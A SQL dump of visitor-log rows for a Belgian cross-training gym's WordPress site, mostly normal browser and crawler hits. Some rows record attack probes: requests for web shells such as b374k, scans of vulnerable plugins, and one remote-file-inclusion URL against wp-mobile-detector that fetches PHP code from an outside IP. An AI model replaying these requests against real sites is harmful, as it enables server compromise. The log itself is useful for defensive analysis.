(73758, 1495899192.565033, 1053970098, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(73759, 1495899201.534108, 1053970098, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(73760, 1495899207.565709, 1053970098, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/feed/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(73761, 1495899207.930915, 1053970098, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/feed/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(73762, 1495899208.320701, 1053970098, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(73763, 1495899213.659346, 1053970098, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(73764, 1495899218.743768, 1053970098, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(73765, 1495899222.806968, 1053970098, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(73766, 1495899227.166857, 1053970098, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/feed/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(73767, 1495899227.506185, 1053970098, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(73768, 1495899518.106174, 3657083455, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73769, 1495901595.551163, 3024883599, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73770, 1495912363.335713, 918820966, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'CCBot/2.0 (http://commoncrawl.org/faq/)'),
(73771, 1495912365.701516, 918820966, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'CCBot/2.0 (http://commoncrawl.org/faq/)'),
(73772, 1495912366.227518, 918820966, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'CCBot/2.0 (http://commoncrawl.org/faq/)'),
(73773, 1495912455.966403, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73774, 1495912456.558178, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73775, 1495912456.992960, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73776, 1495912457.443912, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73777, 1495912457.956157, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73778, 1495912458.396211, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73779, 1495912458.965350, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73780, 1495912459.525173, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73781, 1495912459.985619, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73782, 1495912460.506820, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73783, 1495912460.955343, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73784, 1495927583.329738, 1082769246, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/assets/images/iran78fzfzz.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(73785, 1495928434.794302, 2994513029, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/assets/b374k-2.8.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(73786, 1495928575.931955, 2994513029, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/b374k-2.8.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(73787, 1495930704.428479, 3559911201, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-symposium/readme.txt', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),
(73788, 1495940282.239978, 3472744983, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(73789, 1495940283.009303, 3472744983, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(73790, 1495940283.707901, 3472744983, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(73791, 1495940284.076590, 3472744983, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(73792, 1495952305.250488, 2637637376, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73793, 1495952527.130668, 2637637583, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73794, 1495954406.889432, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(73795, 1495954407.421500, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(73796, 1495954407.867729, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(73797, 1495954408.310969, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(73798, 1495954408.757218, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(73799, 1495954409.152491, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(73800, 1495954409.546557, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(73801, 1495954409.996009, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73802, 1495954410.388592, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(73803, 1495954410.780878, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(73804, 1495954411.185694, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(73805, 1495954411.662157, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(73806, 1495954412.064233, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(73807, 1495954412.469714, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(73808, 1495960916.138656, 2637637583, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73809, 1495964258.772871, 2509950143, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73810, 1495964260.361883, 2509950143, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73811, 1495964277.744356, 2509950143, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73812, 1495964321.052166, 2509950143, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73813, 1495972606.305890, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(73814, 1495972606.891935, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73815, 1495972607.333422, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73816, 1495972607.745100, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73817, 1495972608.172445, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73818, 1495972608.598918, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73819, 1495972609.103674, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73820, 1495972609.509929, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73821, 1495972609.917395, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73822, 1495972610.326886, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73823, 1495972610.738268, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73824, 1495972784.609381, 1546285845, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/newsletter/js/Chart.min.js', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2759.15 Safari/537.36'),
(73825, 1495974684.724859, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73826, 1495974685.238967, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73827, 1495980427.290078, 2071807860, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73828, 1495982159.070521, 3373404845, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(73829, 1495982160.367758, 3373404845, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-mobile-detector/resize.php?src=http://91.103.217.68/~kettfusion/wp-content/redux/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(73830, 1495982161.179869, 3373404845, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-mobile-detector/cache/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(73831, 1495982162.648908, 3373404845, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(73832, 1495982738.329119, 2071807778, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73833, 1495982738.362802, 2071806940, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36'),
(73834, 1495983019.228347, 1584238868, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(73835, 1495987265.797184, 2637637583, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73836, 1495991953.560109, 3024883483, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73837, 1495993507.178549, 2509961690, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(73838, 1495994223.823269, 1450079886, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_39_82) AppleWebKit/532.88.31 (KHTML, like Gecko) Chrome/57.4.9076.4349 Safari/534.59'),
(73839, 1495994225.655501, 1450079886, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_39_82) AppleWebKit/532.88.31 (KHTML, like Gecko) Chrome/57.4.9076.4349 Safari/534.59'),
(73840, 1495995078.995940, 2366145579, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(73841, 1495995556.034172, 3475901901, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73842, 1495995556.280426, 3475901901, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73843, 1495998183.277493, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(73844, 1495998183.832764, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73845, 1495998184.295374, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73846, 1495998184.808759, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73847, 1495998185.324719, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73848, 1495998185.841044, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73849, 1495998186.419091, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73850, 1495998186.868093, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73851, 1495998187.378729, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73852, 1495998188.608656, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73853, 1495998189.255956, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(73854, 1496009300.783923, 3024883617, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73855, 1496013525.239517, 1546285845, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/flash-album-gallery/admin/css/flagSorter.css', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(73856, 1496028001.340497, 1962951373, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/pols.php', 'http://crosstrainingcenter.be/pols.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(73857, 1496038863.296882, 3475901898, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73858, 1496038863.358860, 3475901898, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73859, 1496039119.400202, 520974917, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(73860, 1496041637.387752, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73861, 1496041638.096938, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73862, 1496041638.806069, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73863, 1496041639.278129, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73864, 1496041639.827878, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73865, 1496041640.256151, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73866, 1496041640.675779, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73867, 1496041641.223686, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73868, 1496041641.611590, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73869, 1496041642.006382, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73870, 1496041642.398199, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73871, 1496041642.876692, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73872, 1496041643.285603, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73873, 1496041643.687303, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73874, 1496043165.867212, 2637637583, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73875, 1496046258.950303, 3116152550, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0'),
(73876, 1496051452.648705, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73877, 1496052939.017887, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73878, 1496053537.282864, 1123631171, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73879, 1496053538.266157, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73880, 1496054418.712187, 1343201817, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Pierre Smith'),
